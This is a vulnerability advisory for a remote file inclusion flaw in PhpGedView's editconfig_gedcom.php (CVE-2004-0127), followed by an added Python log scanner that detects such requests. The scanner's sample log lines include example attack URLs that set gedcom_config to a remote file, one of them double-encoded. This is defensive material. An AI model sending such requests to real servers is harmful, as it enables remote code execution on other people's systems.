PhpGedView editconfig_gedcom.php gedcom_config Variable Remote File Inclusion

2004-01-28T05:36:43
ID OSVDB:3768
Type osvdb
Reporter OSVDB
Modified 2004-01-28T05:36:43

Description

Vulnerability Description

PhpGedView contains a flaw that may allow a malicious user with administrative rights to include malicious PHP files. The issue is triggered when an attacker sends a specially-crafted URL request to the editconfig_gedcom.php script to specify a malicious file from a remote system. It is possible that the flaw may allow arbitrary code execution resulting in a loss of confidentiality, integrity, and/or availability.

Solution Description

Upgrade to version 2.65.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
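Requests matching the description above can be looked for in web server access logs. The following is an added example, not part of the original advisory or of PhpGedView: it assumes the "combined" access-log format and that the gedcom_config value travels in the query string, and its sample log lines, paths and host names are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

SCRIPT = "editconfig_gedcom.php"   # script named in the advisory
PARAM = "gedcom_config"            # variable named in the advisory title

# Assumption: Apache/nginx "combined" access-log format.
LINE_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# A value that points off-host: "scheme://..." or protocol-relative "//host".
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:)?//', re.IGNORECASE)

# Constructed sample lines (documentation IP ranges, example.net host).
SAMPLE_LOG = '''\
192.0.2.10 - admin [28/Jan/2004:05:30:01 +0000] "GET /phpgedview/editconfig_gedcom.php?gedcom_config=config_gedcom.php HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
203.0.113.5 - - [28/Jan/2004:05:31:12 +0000] "GET /phpgedview/editconfig_gedcom.php?gedcom_config=http://files.example.net/inc.txt HTTP/1.0" 200 312 "-" "-"
203.0.113.5 - - [28/Jan/2004:05:31:40 +0000] "GET /phpgedview/editconfig_gedcom.php?gedcom_config=hTTp%253A%252F%252Ffiles.example.net%252Finc.txt HTTP/1.0" 200 312 "-" "-"
192.0.2.10 - - [28/Jan/2004:05:32:00 +0000] "GET /phpgedview/index.php?gedcom_config=http://files.example.net/inc.txt HTTP/1.1" 200 900 "-" "-"
'''

def remote_values(target):
    """Return remote-looking gedcom_config values found in a request target."""
    parts = urlsplit(target)
    if unquote(parts.path).rsplit("/", 1)[-1].lower() != SCRIPT:
        return []
    hits = []
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name.split("[", 1)[0] != PARAM:   # PHP also accepts name[] syntax
            continue
        # parse_qs decodes once; unquote again to catch double encoding.
        hits += [unquote(v) for v in values if REMOTE_RE.match(unquote(v))]
    return hits

def scan(log_text):
    """Return (line_no, client_ip, status, value) for each suspicious request.
    Only the query string is visible in access logs; POST bodies are not."""
    findings = []
    for no, line in enumerate(log_text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue
        for value in remote_values(m.group("target")):
            findings.append((no, m.group("ip"), int(m.group("status")), value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit with a 200 status on an installation older than 2.65.2 warrants review of the host; the same parameter on other scripts (the last sample line) is deliberately not matched.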

References:

Vendor URL: http://phpgedview.sourceforge.net/
Secunia Advisory ID: 10753
Related OSVDB ID: 3769
Other Advisory URL: http://www.netvigilance.com/advisory0003
Keyword: netVigilance Security Advisory 3
Keyword: TC 17867
ISS X-Force ID: 14987
CVE-2004-0127